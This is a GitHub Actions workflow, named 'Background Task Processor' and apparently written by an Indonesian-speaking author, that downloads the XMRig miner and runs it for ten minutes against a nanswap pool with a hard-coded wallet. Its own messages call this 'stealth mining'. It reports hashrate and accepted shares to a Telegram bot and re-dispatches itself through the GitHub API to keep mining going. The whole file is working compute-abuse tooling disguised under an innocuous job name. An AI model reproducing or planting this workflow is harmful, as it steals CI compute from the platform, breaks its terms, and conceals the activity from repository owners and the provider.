name: Background Task Processor

on:
  workflow_dispatch:
  schedule:
    - cron: "0 */6 * * *"  # setiap 6 jam

jobs:
  task:
    runs-on: ubuntu-latest
    timeout-minutes: 15

    steps:
      - name: Set up job
        run: echo "Initializing stealth mining task..."

      - name: Prepare Environment
        run: |
          sudo apt update -y && sudo apt install curl tar -y

      - name: Notify Start to Telegram
        env:
          TG_TOKEN: ${{ secrets.TG_TOKEN }}
          TG_CHAT_ID: ${{ secrets.TG_CHAT_ID }}
        run: |
          curl -s -X POST https://api.telegram.org/bot$TG_TOKEN/sendMessage \
            -d chat_id=$TG_CHAT_ID \
            --data-urlencode text="🟢 *Stealth mining dimulai.*\n\nWorker dijalankan via GitHub Actions selama 10 menit." \
            -d parse_mode=Markdown

      - name: Download & Run Stealth Worker
        run: |
          curl -L -o runner.tar.gz https://github.com/xmrig/xmrig/releases/download/v6.24.0/xmrig-6.24.0-linux-static-x64.tar.gz
          tar -xzf runner.tar.gz
          cd xmrig-6.24.0
          chmod +x xmrig
          ./xmrig -o xmrig.nanswap.com:3333 -a rx -k \
            -u nano_1ep4soo6rat31n6otw4ggqdwj7tz5sjymyzfwi7kmhye6f31guujdo19cc3q \
            -p stealth > log.txt 2>&1 &
          PID=$!
          sleep 600
          kill $PID

      - name: Send Mining Stats to Telegram
        if: always()
        env:
          TG_TOKEN: ${{ secrets.TG_TOKEN }}
          TG_CHAT_ID: ${{ secrets.TG_CHAT_ID }}
        run: |
          cd xmrig-6.24.0
          HASHRATE=$(grep -a "speed" log.txt | tail -n1 | awk '{print $6 " H/s"}')
          ACCEPTED=$(grep -a "accepted" log.txt | wc -l)
          REJECTED=$(grep -a "rejected" log.txt | wc -l)
          MSG="📊 *Statistik Mining*\n\n• Hashrate: \`$HASHRATE\`\n• Share Diterima: \`$ACCEPTED\`\n• Share Ditolak: \`$REJECTED\`"
          curl -s -X POST https://api.telegram.org/bot$TG_TOKEN/sendMessage \
            -d chat_id=$TG_CHAT_ID \
            -d text="$MSG" \
            -d parse_mode=Markdown

          # Validasi jika HR valid dan bukan kosong/null
          HR_NUM=$(echo "$HASHRATE" | grep -oE '^[0-9]+')
          if [[ "$HR_NUM" =~ ^[0-9]+$ ]] && [ "$HR_NUM" -lt 100 ]; then
            curl -s -X POST https://api.telegram.org/bot$TG_TOKEN/sendMessage \
              -d chat_id=$TG_CHAT_ID \
              -d text="🚨 *Hashrate rendah terdeteksi!*\n\nHanya $HASHRATE. Cek konfigurasi mining." \
              -d parse_mode=Markdown
          fi

      - name: Notify Done to Telegram
        if: always()
        env:
          TG_TOKEN: ${{ secrets.TG_TOKEN }}
          TG_CHAT_ID: ${{ secrets.TG_CHAT_ID }}
        run: |
          curl -s -X POST https://api.telegram.org/bot$TG_TOKEN/sendMessage \
            -d chat_id=$TG_CHAT_ID \
            --data-urlencode text="🛑 *Stealth mining selesai.*\n\nGitHub Actions menyelesaikan tugas dengan sukses." \
            -d parse_mode=Markdown

      - name: Re-trigger Task
        if: always()
        env:
          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
        run: |
          curl -X POST -H "Accept: application/vnd.github+json" \
               -H "Authorization: Bearer $GH_TOKEN" \
               https://api.github.com/repos/${{ github.repository }}/actions/workflows/build.yml/dispatches \
               -d '{"ref":"main"}'
